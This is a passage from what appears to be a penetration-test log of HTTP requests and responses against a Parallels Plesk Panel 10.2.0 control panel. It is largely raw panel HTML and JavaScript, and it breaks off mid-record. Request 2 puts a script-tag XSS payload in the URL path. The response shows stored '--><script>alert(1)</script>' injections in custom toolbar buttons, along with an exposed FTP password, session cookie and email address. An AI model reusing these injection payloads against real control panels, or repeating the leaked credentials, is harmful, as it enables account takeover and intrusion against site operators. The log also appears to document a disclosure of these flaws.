storage.","href":"\/web\/proxy\/type\/copy"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/site-production_16.gif","title":"Learn How to Move a Site from Development to Production","comment":"View instructions on how to put an updated website into production.","href":"\/web\/site-production"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/how-to-clone-site_16.gif","title":"Learn How to Clone a Site to Development Environment","comment":"View instructions on how to clone the whole website (files, databases and applications).","href":"\/web\/how-to-clone-site"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/logs_16.gif","title":"Logs","comment":"View logs and configure recycling of log files.","href":"\/web\/proxy\/type\/logs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/hotlink-prot_16.gif","title":"Hotlink Protection","comment":"Protect content of your websites from hotlinking.","href":"\/web\/proxy\/type\/hotlink-protection"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-dirs_16.gif","title":"Virtual 
Directories","comment":"Create and manage virtual directories for your websites.","href":"\/web\/proxy\/type\/web-dirs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/band-limit_16.gif","title":"Bandwidth Limiting","comment":"Adjust the limit on bandwidth usage and connections to your websites.","href":"\/web\/proxy\/type\/bandwidth-limit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/iis-app-pool_16.gif","title":"Dedicated IIS Application Pool for Your Websites","comment":"Set up a dedicated IIS application pool for serving websites associated with the currently selected subscription.","href":"\/web\/iis-app-pool"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/dom-aliases_16.gif","title":"Domain Aliases","comment":"View and manage alternative domain names for your websites.","href":"\/web\/proxy\/type\/domain-aliases"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/shared-ssl_16.gif","title":"Master SSL Domain","comment":"Use an SSL certificate associated with one of your websites for securing connections to other sites with the shared SSL service.","href":"\/web\/master-shared-ssl"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-users_16.gif","title":"Web Users","comment":"Set up accounts for users who can host personal web pages on your websites.","href":"\/web\/web-users"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/odbc-dc_16.gif","title":"ODBC Data Sources","comment":"Set up ODBC data sources.","href":"\/web\/proxy\/type\/odbc-data-sources"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/asp-net-settings_16.gif","title":"ASP.NET Settings","comment":"Configure the settings of ASP.NET framework.","href":"\/web\/proxy\/type\/asp-net-settings"},null] }]
}]
});


new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',

items: [
new Jsw.Hint({
hint: 'A website is a collection of related web pages, images, videos, and other files that are accessible by a common domain name. Here is a list of your websites, from which you can change website hosting settings, open a website directory in file manager, view statistics on website visits, install an SSL certificate, view web server logs, and change DNS zone settings.' }),

new Jsw.List({
id: 'sites-list',
searchable: false,
disabledSelectHint: 'The main domain name cannot be removed.',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":1,"totalItemCount":1,"firstItemNumber":1,"lastItemNumber":1},"state":{"sortField":"displayName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":[],"forceShowSearch":false},"data":[{"mainDomain":true,"id":"d:1","domainId":1,"sortKey":"vulnerable.host.fqdn_","displayName":"nosedivesailing.com","statusInactive":null,"hostingType":"vrt_hst","webrootDir":"httpdocs","forwardingUrl":null,"changeHostingUrl":"\/web\/change-hosting\/id\/1","setupUrl":"\/web\/settings\/id\/1","filemanagerUrl":"\/web\/file-manager\/dir\/%2Fhttpdocs","sitebuilderUrl":"","sitebuilderLegacyUrl":null,"statisticsUrl":"window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false;","certificatesUrl":"\/web\/proxy\/type\/ssl-certificates\/id\/1","logsUrl":"\/web\/proxy\/type\/logs\/id\/1","dnsUrl":"\/web\/proxy\/type\/dns\/id\/1","previewUrl":"window.open(\"\/sitepreview\/http\/vulnerable.host.fqdn\/?randomHash=339749585fdadb4623014827567deba3\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; ","maintenanceMode":false,"maintenanceModeUrl":"\/web\/maintenance-mode\/id\/1"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items 
first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/web/list-data',

isDisabledItem: function(item) {
return item.mainDomain;
},

columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Domain',
sortable: true,
dataIndex: 'displayName',
renderer: function(item) {
var inactivitySign = item.statusInactive
? '<b>inactive</b>'
: '';

var link = '<a href="' + Jsw.baseUrl + item.setupUrl + '">'
+ item.displayName.escapeHTML() + '</a>';


if (item.mainDomain) {
link = '<strong class="primary-domain">' + link + '</strong>';
}

if (item.statusInactive) {
link = link
+ '<div class="hint-attention">'
+ 'Inactive' + '</div>';
}

if (item.maintenanceMode) {
link = link
+ '<div class="hint-attention">'
+ 'Switched off for maintenance.' + ' <a href="' + Jsw.baseUrl + item.maintenanceModeUrl + '">'
+ 'Change' + '</a>'
+ '</div>';
}

if (item.hostingType == 'subdomain') {
link = '<div class="level1">' + link + '</div>';
}

return link;
}
},
{
header: 'Hosting',
sortable: false,
renderer: function(item) {
var message = '';

if (item.hostingType == 'vrt_hst' || item.hostingType == 'subdomain') {

var webrootDir = item.webrootDir;

if (item.filemanagerUrl) {
webrootDir = '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ item.webrootDir
+ '</a>';
}

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/website_16.gif"/>'
+ ' '
+ 'Website at' + ' '
+ webrootDir;

} else if (item.hostingType == 'none') {
message = '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" />'
+ '<em class="hint">' + 'No web hosting' + '</em>'
+ ' '
+ '<a href="' + Jsw.baseUrl + item.changeHostingUrl + '">['
+ 'add' + ']</a>';

} else if (item.hostingType == 'frm_fwd' || item.hostingType == 'std_fwd') {

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
+ ' '
+ 'Forward to' + ' '
+ '<a href="' + item.forwardingUrl + '">'
+ item.forwardingUrl
+ '</a>';
}

return message;
}
},
{
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {

var content = '';

content += !item.previewUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Preview the website in your browser. Note that some scripts and Flash animation used on the site might not work in the preview mode.' + '</span>'
+ '<a href="#" onclick=\'' + item.previewUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/preview_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.filemanagerUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Go to website folder for managing files of the website.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/website-folder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType != 'subdomain') {
content += !item.sitebuilderUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.sitebuilderUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';
}
content += !item.sitebuilderLegacyUrl
? ''
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder 4.5 (legacy).' + '</span>'
+ '<a href="' + item.sitebuilderLegacyUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType == 'subdomain' && !item.sitebuilderLegacyUrl) {
content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> ';
}

content += !item.statisticsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View website visits statistics.' + '</span>'
+ '<a href="#" onclick=\'' + item.statisticsUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/stats_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.certificatesUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Secure the site with an SSL certificate.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.certificatesUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/ssl-cert_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.logsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View logs.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.logsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/logs_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.dnsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Change DNS zone settings.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.dnsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/dns_16.gif"/>'
+ '</a>'
+ '</span> ';

return content;
}
}
],

operations: [
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddDomain',
cls: 's-btn sb-new-domain',
title: 'Add New Domain',
description: 'Host a new website on this server, set up web forwarding to another website, or set up a domain DNS zone if you want to have only e-mail addresses under a domain name.',
handler: function() {
Jsw.redirect('/web/add-domain');
}
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddSubDomain',
cls: 's-btn sb-new-subdomain',
title: 'Add New Subdomain',
description: 'Create a site addressed by a third-level domain name, like shop.example.com.',
handler: function() {
Jsw.redirect('/web/add-subdomain');
}
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRegisterDomain',
cls: 's-btn sb-register-domain',
title: 'Register Domain Names',
description: 'Register domain names with a domain name registrar recommended by your provider.',
href: '/web/mpc-register-domain',
target: '_blank'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonManageDomains',
cls: 's-btn sb-manage-domains',
title: 'Manage Domain Names',
description: 'Manage domain names that you registered with your provider: Update registration information, specify name servers, and renew domain registration.',
href: '/web/mpc-manage-domains',
target: '_blank'
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveSite',
title: 'Remove',
description: 'Remove the selected sites and all their web content, including apps, and mail data.',
cls: 's-btn sb-remove-selected',
handler: function() {
Jsw.getComponent('sites-list').execGroupOperation({
url: '/web/delete/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Confirm that you want to remove the selected sites.' }
});
}
}],

onRedraw: function() {
$('sites-list').select('input[name="listCheckbox[]"]').each(function(checkbox) {
checkbox.observe('click', function() {
// if domain selected
if ('undefined' == typeof checkbox.up('tr').down('div.level1')) {
var nextRows = checkbox.up('tr').nextSiblings();
nextRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
throw $break;
}
rowElement.down('input[name="listCheckbox[]"]').checked = checkbox.checked;
if (checkbox.checked) {
rowElement.addClassName('selected');
} else {
rowElement.removeClassName('selected');
}
});
} else {
var prevRows = checkbox.up('tr').previousSiblings();
prevRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
if (!checkbox.checked) {
var parentCheckbox = rowElement.down('input[name="listCheckbox[]"]');
if (parentCheckbox) {
parentCheckbox.checked = false;
rowElement.removeClassName('selected');
}
}
throw $break;
}
});
}
});
});
}
})
]
});

});
//]]>
</script>

</div> <!-- /main -->

<div id="secondary">
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted%2527%2527;

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:34:02 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:34:02 GMT
Connection: close
Content-Length: 111539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Websites &amp; Domains - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="web-sites-and-domains">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/web/action-name/view" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fweb%2Fview%2Fid%2F1%2F%253Cscript%253Ealert%281%29%253C%2Fscript%253E' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Websites &amp; Domains</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.namespace('Smb.Views.Web');

Smb.Views.Web.updateSiteCopyStatus = function() {
new Ajax.Request(Jsw.baseUrl + '/web/site-copy-status/taskId/', {
method: 'get',
parameters: {},
onSuccess: function(transport) {
var result = transport.responseText.evalJSON();

if ('running' == result.status) {
setTimeout("Smb.Views.Web.updateSiteCopyStatus()", 10000);
} else {
$('siteCopyProgress').remove();
if ('ok' == result.status) {
Jsw.addStatusMessage('info', result.message);
} else {
Jsw.addStatusMessage('error', result.message);
}
}
}
});
}

Jsw.onReady(function() {

new Jsw.Container({
renderTo: 'main',
items: [{
componentType: 'Jsw.Hint',
hint: 'This is where you set up and manage websites. If you have several subscriptions associated with your account, then you can switch from one subscription to another by selecting the required subscription at the top of the screen. Note that you can host a number of websites under a single subscription, so there is no need to purchase any additional subscriptions.' }, {
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
items: [null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/site-aps_32.gif","title":"Applications","comment":"Install and manage web apps on your websites. Forums, photo galleries, collaboration tools, and many more installed in several clicks.","href":"\/app"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/file-manager_32.gif","title":"File Manager","comment":"Upload new files and work with current files and directories of your websites.","href":"\/web\/file-manager"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/web-stats_32.gif","title":"Web Statistics","comment":"View the reports on how your websites are visited: See how many people visited a site and which webpages they viewed.","handler":"function() { window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; }"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/ftp-access_32.gif","title":"FTP Access","comment":"Set up access to files of your websites over FTP protocol.","href":"\/web\/ftp-access"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/dns_32.gif","title":"DNS Settings","comment":"Manage DNS zones for your domain names.","href":"\/web\/proxy\/type\/dns"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/certificates_32.gif","title":"SSL Certificates","comment":"Install an SSL certificate on a domain to secure data that your site visitors send to and receive from the site.","href":"\/web\/proxy\/type\/ssl-certificates"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/backup_32.gif","title":"Backup Manager","comment":"Back up and restore your domains, including settings and content of 
websites and mail accounts.","href":"\/web\/backup"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/hosting-setup_32.gif","title":"Web Hosting Settings","comment":"Manage the global hosting settings for all websites, and set up a password for access to the webspace for uploading files.","href":"\/web\/edit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/databases_32.gif","title":"Databases","comment":"Create and remove databases used by your websites, and manage them using integrated administrative web application.","href":"\/database\/list"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"%0066f27<a>3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"66f27%253ca%253e3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"66f27<a>3cc31561d5b","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-but
ton_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/store.parallels.com\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","title":"fdf080d9513e20f46babcaf7","comment":"\/store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage&4cff6--><script>alert(1)<\/script>2ce5d8d75e9=1","icon":"\/skins\/default\/plesk\/images\/btn_default-button_bg.gif","target":"_blank"},{"componentType":"Smb.ToolButton","href":"fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab12c6c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"<script>alert(1)<\/script>?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?%00ddf96<a>904a89e5ae2","icon":"\/images\/custom_buttons\/{0-abc54de0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063<a>01df0b1d826?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bc2ea8c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063%253ca%253e01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
xss?","icon":"\/images\/custom_buttons\/{0-bd2637c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00cf063<a>01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-be190400-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ca6d6340-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2%253ca%253e3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cb24ad20-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_%00b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cbdbf700-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_c3316%2522%253e%253ca%253ee36b31545cd?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take 
